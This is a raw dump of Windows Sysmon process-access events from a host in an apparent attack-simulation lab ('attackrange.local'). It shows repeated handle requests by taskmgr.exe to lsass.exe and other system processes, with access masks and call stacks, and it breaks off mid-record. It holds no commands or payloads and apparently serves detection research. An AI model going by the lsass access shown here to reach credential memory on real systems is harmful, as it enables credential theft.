21:34:49.786{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-0C00-00000000A301}588C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204852Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.786{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-0C00-00000000A301}588C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204851Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.785{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBF-6019-0C00-00000000A301}588C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204850Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.785{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204849Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.785{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204848Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.785{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204847Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.770{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204846Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.770{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBD-6019-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204845Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.770{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBD-6019-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204844Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.770{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBD-6019-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204843Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.770{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBD-6019-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204842Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.770{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBD-6019-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204841Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.770{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBD-6019-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204840Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.770{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBB-6019-0200-00000000A301}448C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204839Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.770{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CBB-6019-0200-00000000A301}448C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204838Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-7CBF-6019-0C00-00000000A301}588940C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204837Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-7CBF-6019-0C00-00000000A301}5882944C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204836Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-7CBF-6019-0C00-00000000A301}5882944C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204835Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-7CBF-6019-0C00-00000000A301}5882944C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204834Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-7CBF-6019-0C00-00000000A301}5882944C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204833Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-7CBF-6019-0C00-00000000A301}5882944C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204832Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-7CBF-6019-0C00-00000000A301}5882944C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204831Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-7CBF-6019-0C00-00000000A301}5882944C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204830Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-7CBF-6019-0C00-00000000A301}5882944C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204829Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-7CBF-6019-0C00-00000000A301}5882944C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204828Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-7CBF-6019-0C00-00000000A301}5882944C:\Windows\system32\svchost.exe{29E67E80-7CBF-6019-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000204827Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-7CBF-6019-0C00-00000000A301}5882944C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204826Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-7CBF-6019-0C00-00000000A301}5882944C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204825Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.754{29E67E80-7CBF-6019-0C00-00000000A301}5882944C:\Windows\system32\svchost.exe{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb